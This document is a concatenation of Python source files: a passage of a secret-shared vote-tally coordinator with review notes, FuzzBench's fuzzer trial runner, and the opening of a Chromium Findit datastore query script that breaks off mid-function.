        self.random = random.Random()
        self.random.seed(seed)
        self.label = label
        self.q = Queue()
        self.scheduler_port = scheduler_port

    def obfuscate(self, state):
        """Map a plain state to its obfuscated byte via the loaded LUT."""
        return self.olut[state]

    def connect(self):
        """Open the index/vector TCP connections to the remote server.

        Returns:
            bool: True on success, False when either connect fails.
        """
        self.risock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.rvsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Latency matters more than throughput for these tiny messages.
        self.risock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        self.rvsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        try:
            self.risock.connect((self.ip, self.riport))
            self.rvsock.connect((self.ip, self.rvport))
            print('Connected.')
            return True
        except socket.error:
            # Fix: was a bare `except:` that also swallowed
            # KeyboardInterrupt/SystemExit; only socket errors mean
            # "connection failed".
            return False

    def stop(self):
        """Close both outbound sockets."""
        self.risock.close()
        self.rvsock.close()

    def loadLut(self, path):
        """Load the obfuscation LUT: one byte per state, in file order."""
        self.olut = []
        # Fix: context manager guarantees the file is closed even if a
        # read raises.
        with open(path, 'rb') as f:
            while True:
                b = f.read(1)
                if not b:
                    break
                self.olut.append(b)
class LocalServer(Server):
    """Coordinator that fans a secret-shared vote tally out to six
    remote tally servers (aliased a..f).

    NOTE(review): the comments below describe only what is visible in
    this file; the exact wire protocol (byte layouts, peer ordering)
    should be confirmed against the remote-server implementation.
    """
    def __init__(self, remote_servers):
        # Convenience aliases for the six remote peers, in order.
        self.a = remote_servers[0]
        self.b = remote_servers[1]
        self.c = remote_servers[2]
        self.d = remote_servers[3]
        self.e = remote_servers[4]
        self.f = remote_servers[5]
        # Queue of incoming vote bits consumed by addVote().
        self.voteaddQ = Queue()
        # Queue of vector indexes produced by parreduces() for the peer
        # whose index is handled locally (the osx[2] is None case).
        self.vectorBQ = Queue()
    def initiateTally(self, value, length):
        # The tally is processed in 3-bit windows, hence the assertion.
        assert(length % 3 == 0)
        self.tally_length = length
        self.tally = value
    def startListeningIndex(self, remote_server):
        # Accept exactly one inbound "index" connection from this peer.
        remote_server.isock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote_server.isock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        remote_server.isock.bind(('0.0.0.0', remote_server.iport))
        remote_server.isock.listen(0)
        remote_server.iconn, remote_server.iaddr = remote_server.isock.accept()
        print 'Listen Connected to %s' % remote_server.label
    def listeningIndex(self, remote_servers):
        # Should be: b,d,e,f
        # Accept one connection per peer, each on its own thread.
        lthreads = []
        for remote_server in [self.b, self.c, self.d, self.e, self.f]:
            lt = Thread(target=self.startListeningIndex, args=(remote_server,))
            lt.start()
            lthreads.append(lt)
        for lt in lthreads:
            lt.join()
        print 'All joined'
        row_bytes_inorder = []
        for k in range(3):
            row_bytes_inorder.append(k)
        states_x_pre = 3 * 3 * 3
        while True:
            # One index byte from each peer per round.
            indexes = []
            for remote_server in remote_servers:
                b1 = remote_server.iconn.recv(1)
                if len(b1) == 0:
                    # Peer closed the connection. NOTE(review): this
                    # returns without running the cleanup below.
                    return
                indexes.append(struct.unpack("<B", b1)[0])
            #osb = remote_servers[0].q.get()
            osb = self.vectorBQ.get()
            osbf = 0
            states_x = states_x_pre
            oss = 0
            # Decode a base-3 offset from the last three peer indexes.
            for i in [1,2,3]:
                oss += (states_x * indexes[i])
                states_x = states_x / 3
            i = 0
            osbf = 0
            osbi = 0
            # Replay the peer's shuffles/randints (shared PRNG seed) to
            # locate where our obfuscated value landed (osbi) and which
            # mask byte applies to it (osbf).
            while i < 3:
                j = 0
                while j < 27:
                    row_bytes = copy.deepcopy(row_bytes_inorder)
                    remote_servers[0].random.shuffle(row_bytes)
                    osb_new = row_bytes.index(osb)
                    k = 0
                    while k < 3:
                        tmp_r = self.b.random.randint(0,STATES-1)
                        if i == indexes[0] and j*3 == oss and k == osb_new:
                            osbf = tmp_r
                            osbi = osb_new + oss
                        k += 1
                    j += 1
                i += 1
            # Reply: 16-bit little-endian index followed by the mask byte.
            remote_servers[0].iconn.sendall(struct.pack("<BB", osbi & 255, (osbi >> 8) & 255) + struct.pack("<B", (osbf & 255)))
        sleep(5)
        for remote_server in [self.b, self.c, self.d, self.e, self.f]:
            remote_server.iconn.close()
        print 'listeningIndex closing.'
        sys.exit()
        #thread.exit()
    def startListeningMiniLUT(self, remote_server):
        # Accept exactly one inbound "vector" connection from this peer.
        remote_server.vsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote_server.vsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        remote_server.vsock.bind(('0.0.0.0', remote_server.vport))
        remote_server.vsock.listen(0)
        remote_server.vconn, remote_server.vaddr = remote_server.vsock.accept()
        print 'listeningMiniLUT Connected to %s' % remote_server.label
    def listeningMiniLUT(self, remote_servers):
        #should be b,c,d,f in order f,b,c,d
        lthreads = []
        #for remote_server in remote_servers:
        for remote_server in [self.b, self.c, self.d, self.e, self.f]:
            lt = Thread(target=self.startListeningMiniLUT, args=(remote_server,))
            lt.start()
            lthreads.append(lt)
        for lt in lthreads:
            lt.join()
        print 'All joined'
        # Precomputed powers of STATES used as positional multipliers.
        STATES5 = STATES * STATES * STATES * STATES * STATES
        STATES4 = STATES * STATES * STATES * STATES
        STATES3 = STATES * STATES * STATES
        STATES2 = STATES * STATES
        while True:
            break_main = False
            # One 3-byte vector from each of the five peers per round.
            vectors = []
            #for remote_server in remote_servers:
            for remote_server in [self.f, self.b, self.c, self.d, self.e]:
                b4 = remote_server.vconn.recv(3)
                if len(b4) == 0:
                    break_main = True
                    break
                vectors.append(struct.unpack("<BBB", b4))
            if break_main:
                break
            osf = remote_servers[0].q.get() * STATES4
            rbs = ''
            j = 0
            prev = None
            # Enumerate all 3^5 vector combinations; each combination
            # addresses one result_lut row, which is shuffled and masked
            # with f's PRNG stream before being appended to the reply.
            for i0 in [0,1,2]:
                b0 = osf + (vectors[0][i0] * STATES5)
                for i1 in [0,1,2]:
                    b1 = b0 + (vectors[1][i1] * STATES3)
                    for i2 in [0,1,2]:
                        b2 = b1 + (vectors[2][i2] * STATES2)
                        for i3 in [0,1,2]:
                            b3 = b2 + (vectors[3][i3] * STATES)
                            row_bytes = [0,0,0]
                            for i4 in [0,1,2]:
                                i = b3 + (vectors[4][i4])
                                row_bytes[i4] = self.result_lut[i]
                            self.f.random.shuffle(row_bytes)
                            rb1 = row_bytes[0]
                            rb2 = row_bytes[1]
                            rb3 = row_bytes[2]
                            tmp_r1 = self.f.random.randint(0,STATES-1)
                            tmp_r2 = self.f.random.randint(0,STATES-1)
                            tmp_r3 = self.f.random.randint(0,STATES-1)
                            rbs += struct.pack("<B", (struct.unpack("<B", rb1)[0] ^ tmp_r1))
                            rbs += struct.pack("<B", (struct.unpack("<B", rb2)[0] ^ tmp_r2))
                            rbs += struct.pack("<B", (struct.unpack("<B", rb3)[0] ^ tmp_r3))
            remote_servers[0].vconn.sendall(rbs)
        sleep(5)
        for remote_server in [self.b, self.c, self.d, self.e, self.f]:
            remote_server.iconn.close()
        print 'listeningMiniLUT closing.'
        sys.exit()
    def listen(self):
        # Spawn the two protocol listeners and the vote-adder worker.
        self.lithread = Thread(target = self.listeningIndex, args = ([self.b, self.d, self.e, self.f],))
        self.mlthread = Thread(target = self.listeningMiniLUT, args = ([self.f, self.b, self.c, self.d],))
        self.avthread = Thread(target = self.addVote, args = ())
        self.lithread.start()
        self.mlthread.start()
        self.avthread.start()
    def loadResultLut(self, path):
        # Load the result lookup table: one byte per entry, file order.
        self.result_lut = []
        f = open(path, 'rb')
        while True:
            b = f.read(1)
            if not b:
                break
            self.result_lut.append(b)
        f.close()
    def parreduces(self, pstates):
        """Obfuscate each state batch, distribute masked vectors/indexes
        to the peers, then collect and unmask the reduced states."""
        pvis = []
        for states in pstates:
            my_vis = []
            sends_rv = {}
            sends_ri = {}
            for remote_server in [self.b, self.c, self.d, self.e, self.f]:
                sends_rv[remote_server] = ""
                sends_ri[remote_server] = ""
            for state in states:
                # Per-peer obfuscations of the same state.
                osa = self.a.obfuscate(state)
                osb = self.b.obfuscate(state)
                osc = self.c.obfuscate(state)
                osd = self.d.obfuscate(state)
                ose = self.e.obfuscate(state)
                #for remote_server in [self.b, self.c, self.d, self.e, self.f]:
                for remote_server in [self.c, self.d, self.e, self.f]:
                    remote_server.q.put(struct.unpack("<B", remote_server.obfuscate(state))[0])
                my_vi = -1
                # Each entry: (obfuscated state, vector recipient,
                # index recipient or None for the locally handled one).
                for osx in [[osa, self.b, self.f], [osb, self.c, None], [osc, self.d, self.b], [osd, self.e, self.c], [ose, self.f, self.d]]:
                    # Hide the real value among two distinct decoys.
                    vec = [osx[0]]
                    i = 0
                    while i < 2:
                        r = struct.pack("<B", random.randint(0, STATES - 1))
                        if r not in vec:
                            vec.append(r)
                            i += 1
                    # NOTE(review): this uses the module-level `random`,
                    # not a seeded per-server PRNG — confirm intentional.
                    random.shuffle(vec)
                    vi = vec.index(osx[0])
                    if my_vi == -1:
                        my_vi = vi
                    sends_rv[osx[1]] += vec[0]+vec[1]+vec[2]
                    if osx[2] == None:
                        self.vectorBQ.put(vi)
                    else:
                        sends_ri[osx[2]] += struct.pack("<B", vi)
                my_vis.append(my_vi)
            pvis.append(my_vis)
            for remote_server in [self.b, self.c, self.d, self.e, self.f]:
                remote_server.rvsock.sendall(sends_rv[remote_server])
                remote_server.risock.sendall(sends_ri[remote_server])
        presults = []
        for pi in range(len(pstates)):
            rstates = []
            # NOTE(review): `states` here is the leaked loop variable
            # from the last batch above — assumes all batches have the
            # same length; confirm.
            for si in range(len(states)):
                # 16-bit index + mask byte from f, 243-byte row block
                # from b; pick the 81-byte mini-LUT our vector index
                # selects and unmask the addressed byte.
                index = struct.unpack("<BB", self.f.risock.recv(2))
                index = (index[1] << 8) + index[0]
                flip = struct.unpack("<B", self.f.risock.recv(1))[0]
                rows = self.b.rvsock.recv(243)
                small_lut = rows[81 * (pvis[pi][si]): 81 * (pvis[pi][si]) + 81]
                rstates.append((struct.unpack("<B", small_lut[index])[0] ^ flip))
                # TODO: Check for invalid state
            presults.append(rstates)
        return presults
    def addVote(self):
        """Worker loop: consume vote bits and ripple them through the
        3-bit tally windows via parreduces()."""
        sleep(10)
        tally_window = []
        carry_window = []
        vote_window_len = self.tally_length / 3
        tand = 7
        for i in range(vote_window_len):
            # NOTE(review): `tand` (0b111) is applied before the shift,
            # so every window above the first extracts 0 — verify this
            # is not meant to be (self.tally >> (i * 3)) & tand.
            tally_window.append((self.tally & tand) >> (i * 3))
            carry_window.append(None)
        while True:
            # Blocks until the next vote bit arrives.
            carry_window[0] = self.voteaddQ.get()
            states = []
            for i in range(vote_window_len):
                carry = carry_window[i]
                if carry == None:
                    continue
                # Pack window value (low 3 bits) with its carry (bit 3).
                states.append(tally_window[i] + (carry << 3))
            rstates = self.parreduces([states])[0]
            rsi = 0
            for i in range(vote_window_len):
                if carry_window[i] == None:
                    continue
                # Result byte: bit 0 = carry out, bits 1+ = new window.
                carry_window[i] = rstates[rsi] & 1
                tally_window[i] = (rstates[rsi] >> 1)
                rsi += 1
            # Shift carries one window up for the next round.
            for i in range(vote_window_len-1, 0, -1):
                carry_window[i] = carry_window[i-1]
            print tally_window
|
runner.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs fuzzer for trial."""
from collections import namedtuple
import os
import posixpath
import shlex
import shutil
import subprocess
import sys
import tarfile
import threading
import time
import zipfile
from common import environment
from common import experiment_utils
from common import filesystem
from common import fuzzer_utils
from common import gsutil
from common import logs
from common import new_process
from common import retry
from common import utils
# Retry/backoff settings for GCS sync operations.
NUM_RETRIES = 3
RETRY_DELAY = 3
# Directory inside the runner image where fuzz target binaries live.
FUZZ_TARGET_DIR = '/out'
# This is an optimization to sync corpora only when it is needed. These files
# are temporary files generated during fuzzer runtime and are not related to
# the actual corpora.
EXCLUDE_PATHS = set([
    # AFL excludes.
    '.cur_input',
    '.state',
    'fuzz_bitmap',
    'fuzzer_stats',
    'plot_data',
    # QSYM excludes.
    'bitmap',
])
# Seed/corpus files above this size (1 MB) are removed or skipped.
CORPUS_ELEMENT_BYTES_LIMIT = 1 * 1024 * 1024
SEED_CORPUS_ARCHIVE_SUFFIX = '_seed_corpus.zip'
# Snapshot of one corpus file's path and timestamps; used to detect
# whether the corpus changed between sync cycles.
File = namedtuple('File', ['path', 'modified_time', 'change_time'])
# Set to True by run_fuzzer() when the fuzzer process exits nonzero.
fuzzer_errored_out = False  # pylint:disable=invalid-name
def _clean_seed_corpus(seed_corpus_dir):
    """Flatten the seed corpus: move every file from sub-directories into
    the corpus root, renamed to its content hash, and delete any file over
    the 1 MB corpus-element limit."""
    if not os.path.exists(seed_corpus_dir):
        return

    move_failures = []
    for dirpath, _, filenames in os.walk(seed_corpus_dir):
        for name in filenames:
            src = os.path.join(dirpath, name)
            if os.path.getsize(src) > CORPUS_ELEMENT_BYTES_LIMIT:
                os.remove(src)
                logs.warning('Removed seed file %s as it exceeds 1 Mb limit.',
                             src)
                continue
            # Hash-based name deduplicates identical seeds.
            dst = os.path.join(seed_corpus_dir, utils.file_hash(src))
            try:
                shutil.move(src, dst)
            except OSError:
                move_failures.append((src, dst))

    if move_failures:
        logs.error('Failed to move seed corpus files: %s', move_failures)
def _get_fuzzer_environment():
"""Returns environment to run the fuzzer in (outside virtualenv)."""
env = os.environ.copy()
path = env.get('PATH')
if not path:
return env
path_parts = path.split(':')
# |VIRTUALENV_DIR| is the virtualenv environment that runner.py is running
# in. Fuzzer dependencies are installed in the system python environment,
# so need to remove it from |PATH|.
virtualenv_dir = env.get('VIRTUALENV_DIR')
if not virtualenv_dir:
return env
path_parts_without_virtualenv = [
p for p in path_parts if not p.startswith(virtualenv_dir)
]
env['PATH'] = ':'.join(path_parts_without_virtualenv)
return env
def get_clusterfuzz_seed_corpus_path(fuzz_target_path):
    """Return the path of the clusterfuzz seed corpus archive for
    |fuzz_target_path| when one exists on disk, otherwise None."""
    base, _ = os.path.splitext(fuzz_target_path)
    candidate = base + SEED_CORPUS_ARCHIVE_SUFFIX
    if os.path.exists(candidate):
        return candidate
    return None
def _unpack_clusterfuzz_seed_corpus(fuzz_target_path, corpus_directory):
    """If a clusterfuzz seed corpus archive is available, unpack it into the
    corpus directory if it exists. Copied from unpack_seed_corpus in
    engine_common.py in ClusterFuzz.
    """
    seed_corpus_archive_path = get_clusterfuzz_seed_corpus_path(
        fuzz_target_path)
    if not seed_corpus_archive_path:
        return
    with zipfile.ZipFile(seed_corpus_archive_path) as zip_file:
        # Unpack seed corpus recursively into the root of the main corpus
        # directory.
        idx = 0
        for seed_corpus_file in zip_file.infolist():
            if seed_corpus_file.filename.endswith('/'):
                # Ignore directories.
                continue
            # Allow callers to opt-out of unpacking large files.
            if seed_corpus_file.file_size > CORPUS_ELEMENT_BYTES_LIMIT:
                continue
            # Sequential fixed-width names avoid collisions between
            # entries from different archive sub-directories.
            output_filename = '%016d' % idx
            output_file_path = os.path.join(corpus_directory, output_filename)
            # NOTE(review): ZipFile.extract() treats its second argument
            # as a target *directory*, so this creates a directory named
            # |output_filename| containing the member under its archive
            # path rather than a flat file — confirm this layout is
            # intended.
            zip_file.extract(seed_corpus_file, output_file_path)
            idx += 1
    logs.info('Unarchived %d files from seed corpus %s.', idx,
              seed_corpus_archive_path)
def run_fuzzer(max_total_time, log_filename):
    """Runs the fuzzer using its script. Logs stdout and stderr of the fuzzer
    script to |log_filename| if provided.

    Sets the module-level |fuzzer_errored_out| flag when the fuzzer
    process exits nonzero.
    """
    input_corpus = environment.get('SEED_CORPUS_DIR')
    output_corpus = environment.get('OUTPUT_CORPUS_DIR')
    fuzz_target_name = environment.get('FUZZ_TARGET')
    target_binary = fuzzer_utils.get_fuzz_target_binary(FUZZ_TARGET_DIR,
                                                        fuzz_target_name)
    if not target_binary:
        logs.error('Fuzz target binary not found.')
        return
    # Seed the input corpus from the target's clusterfuzz archive (if
    # any) and flatten/limit it before fuzzing starts.
    _unpack_clusterfuzz_seed_corpus(target_binary, input_corpus)
    _clean_seed_corpus(input_corpus)
    if max_total_time is None:
        logs.warning('max_total_time is None. Fuzzing indefinitely.')
    runner_niceness = environment.get('RUNNER_NICENESS', 0)
    try:
        # Because the runner is launched at a higher priority,
        # set it back to the default(0) for fuzzing processes.
        command = [
            'nice', '-n',
            str(0 - runner_niceness), 'python3', '-u', '-c',
            ('import fuzzer; '
             'fuzzer.fuzz('
             "'{input_corpus}', '{output_corpus}', '{target_binary}')").format(
                 input_corpus=shlex.quote(input_corpus),
                 output_corpus=shlex.quote(output_corpus),
                 target_binary=shlex.quote(target_binary))
        ]
        fuzzer_environment = _get_fuzzer_environment()
        # Write output to stdout if user is fuzzing from command line.
        # Otherwise, write output to the log file.
        if environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
            new_process.execute(command,
                                timeout=max_total_time,
                                write_to_stdout=True,
                                kill_children=True,
                                env=fuzzer_environment)
        else:
            with open(log_filename, 'wb') as log_file:
                new_process.execute(command,
                                    timeout=max_total_time,
                                    output_file=log_file,
                                    kill_children=True,
                                    env=fuzzer_environment)
    except subprocess.CalledProcessError:
        global fuzzer_errored_out  # pylint:disable=invalid-name
        fuzzer_errored_out = True
        logs.error('Fuzz process returned nonzero.')
class TrialRunner:  # pylint: disable=too-many-instance-attributes
    """Class for running a trial.

    Starts the fuzzer on a background thread and periodically syncs
    corpus archives and results to GCS until the fuzzer exits.
    """

    def __init__(self):
        benchmark_fuzzer_directory = '%s-%s' % (environment.get('BENCHMARK'),
                                                environment.get('FUZZER'))
        if not environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
            bucket = environment.get('CLOUD_EXPERIMENT_BUCKET')
            experiment_name = environment.get('EXPERIMENT')
            trial = 'trial-%d' % environment.get('TRIAL_ID')
            # GCS directory this trial syncs its corpora/results to.
            self.gcs_sync_dir = posixpath.join(bucket, experiment_name,
                                               'experiment-folders',
                                               benchmark_fuzzer_directory,
                                               trial)
            # Clean the directory before we use it.
            gsutil.rm(self.gcs_sync_dir, force=True, parallel=True)
        else:
            # Local/command-line run: nothing is synced to GCS.
            self.gcs_sync_dir = None
        self.cycle = 1
        self.corpus_dir = 'corpus'
        self.corpus_archives_dir = 'corpus-archives'
        self.results_dir = 'results'
        # File recording which cycles had no corpus changes.
        self.unchanged_cycles_path = os.path.join(self.results_dir,
                                                  'unchanged-cycles')
        self.last_sync_time = None
        self.corpus_dir_contents = set()

    def initialize_directories(self):
        """Initialize directories needed for the trial."""
        directories = [
            self.corpus_dir,
            self.corpus_archives_dir,
            self.results_dir,
        ]
        for directory in directories:
            filesystem.recreate_directory(directory)

    def conduct_trial(self):
        """Conduct the benchmarking trial."""
        self.initialize_directories()
        log_file = os.path.join(self.results_dir, 'fuzzer-log.txt')
        logs.info('Starting trial.')
        max_total_time = environment.get('MAX_TOTAL_TIME')
        args = (max_total_time, log_file)
        # Fuzzing happens on a background thread; this thread syncs.
        fuzz_thread = threading.Thread(target=run_fuzzer, args=args)
        fuzz_thread.start()
        if environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
            # Hack so that the fuzz_thread has some time to fail if something is
            # wrong. Without this we will sleep for a long time before checking
            # if the fuzz thread is alive.
            time.sleep(5)
        while fuzz_thread.is_alive():
            self.sleep_until_next_sync()
            self.do_sync()
            self.cycle += 1
        logs.info('Doing final sync.')
        self.do_sync(final_sync=True)
        fuzz_thread.join()

    def sleep_until_next_sync(self):
        """Sleep until it is time to do the next sync."""
        if self.last_sync_time is not None:
            next_sync_time = (self.last_sync_time +
                              experiment_utils.get_snapshot_seconds())
            sleep_time = next_sync_time - time.time()
            if sleep_time < 0:
                # Log error if a sync has taken longer than
                # get_snapshot_seconds() and messed up our time
                # synchronization.
                logs.warning('Sleep time on cycle %d is %d', self.cycle,
                             sleep_time)
                sleep_time = 0
        else:
            # First cycle: no previous sync to anchor on.
            sleep_time = experiment_utils.get_snapshot_seconds()
        logs.debug('Sleeping for %d seconds.', sleep_time)
        time.sleep(sleep_time)
        # last_sync_time is recorded before the sync so that each sync happens
        # roughly get_snapshot_seconds() after each other.
        self.last_sync_time = time.time()

    def _set_corpus_dir_contents(self):
        """Set |self.corpus_dir_contents| to the current contents of
        |self.corpus_dir|. Don't include files or directories excluded by
        |EXCLUDE_PATHS|."""
        self.corpus_dir_contents = set()
        corpus_dir = os.path.abspath(self.corpus_dir)
        for root, _, files in os.walk(corpus_dir):
            # Check if root is excluded.
            relpath = os.path.relpath(root, corpus_dir)
            if _is_path_excluded(relpath):
                continue
            for filename in files:
                # Check if filename is excluded first.
                if _is_path_excluded(filename):
                    continue
                file_path = os.path.join(root, filename)
                stat_info = os.stat(file_path)
                last_modified_time = stat_info.st_mtime
                # Warning: ctime means creation time on Win and may not work as
                # expected.
                last_changed_time = stat_info.st_ctime
                file_tuple = File(file_path, last_modified_time,
                                  last_changed_time)
                self.corpus_dir_contents.add(file_tuple)

    def is_corpus_dir_same(self):
        """Sets |self.corpus_dir_contents| to the current contents and returns
        True if it is the same as the previous contents."""
        logs.debug('Checking if corpus dir is the same.')
        prev_contents = self.corpus_dir_contents.copy()
        self._set_corpus_dir_contents()
        return prev_contents == self.corpus_dir_contents

    def do_sync(self, final_sync=False):
        """Save corpus archives and results to GCS."""
        try:
            if not final_sync and self.is_corpus_dir_same():
                # Skip the archive when nothing changed; just record it.
                logs.debug('Cycle: %d unchanged.', self.cycle)
                filesystem.append(self.unchanged_cycles_path, str(self.cycle))
            else:
                logs.debug('Cycle: %d changed.', self.cycle)
                self.archive_and_save_corpus()
            self.save_results()
            logs.debug('Finished sync.')
        except Exception:  # pylint: disable=broad-except
            # A failed sync shouldn't kill the trial; the next cycle
            # will try again.
            logs.error('Failed to sync cycle: %d.', self.cycle)

    def archive_corpus(self):
        """Archive this cycle's corpus."""
        archive = os.path.join(
            self.corpus_archives_dir,
            experiment_utils.get_corpus_archive_name(self.cycle))
        directories = [self.corpus_dir]
        if self.cycle == 1:
            # Some fuzzers like eclipser and LibFuzzer don't actually copy the
            # seed/input corpus to the output corpus (which AFL does do), this
            # results in their coverage being undercounted.
            seed_corpus = environment.get('SEED_CORPUS_DIR')
            directories.append(seed_corpus)
        archive_directories(directories, archive)
        return archive

    def save_corpus_archive(self, archive):
        """Save corpus |archive| to GCS and delete when done."""
        if not self.gcs_sync_dir:
            return
        basename = os.path.basename(archive)
        gcs_path = posixpath.join(self.gcs_sync_dir, self.corpus_dir, basename)
        # Don't use parallel to avoid stability issues.
        gsutil.cp(archive, gcs_path)
        # Delete corpus archive so disk doesn't fill up.
        os.remove(archive)

    @retry.wrap(NUM_RETRIES, RETRY_DELAY,
                'experiment.runner.TrialRunner.archive_and_save_corpus')
    def archive_and_save_corpus(self):
        """Archive and save the current corpus to GCS."""
        archive = self.archive_corpus()
        self.save_corpus_archive(archive)

    @retry.wrap(NUM_RETRIES, RETRY_DELAY,
                'experiment.runner.TrialRunner.save_results')
    def save_results(self):
        """Save the results directory to GCS."""
        if not self.gcs_sync_dir:
            return
        # Copy results directory before rsyncing it so that we don't get an
        # exception from uploading a file that changes in size. Files can change
        # in size because the log file containing the fuzzer's output is in this
        # directory and can be written to by the fuzzer at any time.
        results_copy = filesystem.make_dir_copy(self.results_dir)
        gsutil.rsync(results_copy,
                     posixpath.join(self.gcs_sync_dir, self.results_dir))
def archive_directories(directories, archive_path):
    """Write a gzipped tarball at |archive_path| containing the contents
    of every directory in |directories|."""
    with tarfile.open(archive_path, 'w:gz') as tar:
        for source_directory in directories:
            tar_directory(source_directory, tar)
def tar_directory(directory, tar):
    """Add the contents of |directory| to |tar|.

    Files may be deleted from |directory| concurrently (the fuzzer owns
    it); such races are ignored rather than retried — missing files will
    be picked up by the next sync. Entries are stored under the
    directory's basename so the tarball unpacks into a single folder.
    """
    directory = os.path.abspath(directory)
    directory_name = os.path.basename(directory)
    for root, _, files in os.walk(directory):
        for filename in files:
            file_path = os.path.join(root, filename)
            arcname = os.path.join(directory_name,
                                   os.path.relpath(file_path, directory))
            try:
                tar.add(file_path, arcname=arcname)
            except OSError:
                # Fix: FileNotFoundError is a subclass of OSError, so
                # the original (FileNotFoundError, OSError) pair was
                # redundant. Races with concurrent deletion land here;
                # don't bother rescanning — the next sync picks up new
                # files.
                pass
            except Exception:  # pylint: disable=broad-except
                logs.error('Unexpected exception occurred when archiving.')
def _is_path_excluded(path):
    """Return True if any component of |path| appears in |EXCLUDE_PATHS|."""
    components = path.split(os.sep)
    return any(part and part in EXCLUDE_PATHS for part in components)
def experiment_main():
    """Do a trial as part of an experiment.

    Any exception from the trial is logged and then propagated to the
    caller unchanged.
    """
    logs.info('Doing trial as part of experiment.')
    try:
        runner = TrialRunner()
        runner.conduct_trial()
    except Exception:  # pylint: disable=broad-except
        logs.error('Error doing trial.')
        # Idiom fix: bare `raise` re-raises the active exception with
        # its original traceback (equivalent to, but cleaner than,
        # `except ... as error: raise error`).
        raise
def main():
    """Do an experiment on a development machine or on a GCP runner instance.

    Returns 1 when the fuzzer errored out, 0 otherwise (used as the
    process exit status).
    """
    # Tag every log line with the trial's identifying metadata.
    logs.initialize(
        default_extras={
            'benchmark': environment.get('BENCHMARK'),
            'component': 'runner',
            'fuzzer': environment.get('FUZZER'),
            'trial_id': str(environment.get('TRIAL_ID')),
        })
    experiment_main()
    return 1 if fuzzer_errored_out else 0
# Script entry point: exit status 1 signals the fuzzer errored out.
if __name__ == '__main__':
    sys.exit(main())
|
bottleneck_query.py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import os
import pickle
import Queue
import re
import sys
import time
from threading import Thread
_APPENGINE_SDK_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir,
os.path.pardir, os.path.pardir,
os.path.pardir, os.path.pardir,
'google_appengine')
sys.path.insert(1, _APPENGINE_SDK_DIR)
from google.appengine.ext import ndb
_REMOTE_API_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir)
sys.path.insert(1, _REMOTE_API_DIR)
import remote_api
from gae_libs.http.http_client_appengine import HttpClientAppengine
from libs import time_util
from model.wf_analysis import WfAnalysis
from pipeline_utils.appengine_third_party_pipeline_python_src_pipeline \
import pipeline
_THIRD_PARTY_DIR = os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir, 'third_party')
sys.path.insert(0, _THIRD_PARTY_DIR)
import google
google.__path__.insert(0, os.path.join(_THIRD_PARTY_DIR, 'google'))
from handlers import handlers_util
from waterfall import swarming_util
NOW = time_util.GetUTCNow()
START_DATE, END_DATE = NOW - datetime.timedelta(days=30), NOW
THREAD_COUNT = 64
# If more than 1199 entities are requested at once, the ndb query.fetch_page()
# operation will stall.
MAX_ENTITIES_PER_REQUEST = 1199
CLIENT_SINGLETON = HttpClientAppengine()
def _BigFetch(query, page_size=MAX_ENTITIES_PER_REQUEST):
    """Fetch every result of |query| by paging through it.

    Pages of |page_size| entities are requested with fetch_page() and
    concatenated into a single list.
    """
    print('Please wait. Fetching results at a rate of ~400 records per second...')
    collected = []
    cursor, more = None, True
    while more:
        page, cursor, more = query.fetch_page(page_size, start_cursor=cursor)
        collected.extend(page)
    print('Finished fetching results.')
    return collected
def _FetchAnalyses(start_date, end_date):
    """Return all WfAnalysis entities whose build started within
    [start_date, end_date)."""
    date_range_query = WfAnalysis.query(
        WfAnalysis.build_start_time >= start_date,
        WfAnalysis.build_start_time < end_date)
    return _BigFetch(date_range_query)
def _GetPickleFilePath():
findit_tmp_dir = os.environ.get('TMP_DIR', os.getcwd())
return (os.path.join(findit_tmp_dir, 'analyses.pickle'),
os.path.join(findit_tmp_dir, 'records.pickle'))
def _SaveAnalyses(analyses, records):
    """Pickle |analyses| and |records| to their on-disk cache files.

    Serves as a local cache so repeated runs don't re-fetch everything
    from datastore.
    """
    pickled_analyses = pickle.dumps(analyses)
    pickled_records = pickle.dumps(records)
    analyses_path, records_path = _GetPickleFilePath()
    # Fix: pickle output is binary data; writing it in text mode ('w')
    # corrupts it on platforms with newline translation. Use 'wb'.
    # (Reading back in 'r' stays safe: 'wb' output contains no '\r\n'.)
    with open(analyses_path, 'wb') as f:
        f.write(pickled_analyses)
    with open(records_path, 'wb') as f:
        f.write(pickled_records)
def _LoadAnalyses():
    """Load the cached analyses/records pickles.

    Returns (analyses, earliest_start, latest_start, records). Raises
    IOError when the cache files are missing, which the caller treats
    as a cache miss.
    """
    analyses_path, records_path = _GetPickleFilePath()
    with open(analyses_path, 'r') as f:
        raw_analyses = f.read()
    with open(records_path, 'r') as f:
        raw_records = f.read()
    print('Loading pickled analyses...')
    analyses = pickle.loads(raw_analyses)
    start_times = [entity.build_start_time for entity in analyses
                   if hasattr(entity, 'build_start_time')]
    records = pickle.loads(raw_records)
    return analyses, min(start_times), max(start_times), records
def _GetTimesFromPipeline(pid):
    """Collect start/end times for every child pipeline of |pid|.

    Returns a dict keyed 'pl.<ClassName>.start[.N]' / 'pl.<ClassName>.end[.N]'
    where the numeric '.N' suffix disambiguates repeated class names.
    """
    result = {}
    suffixes = {}
    status_tree = pipeline.get_status_tree(pid)
    for _, child_status in status_tree.get('pipelines', {}).iteritems():
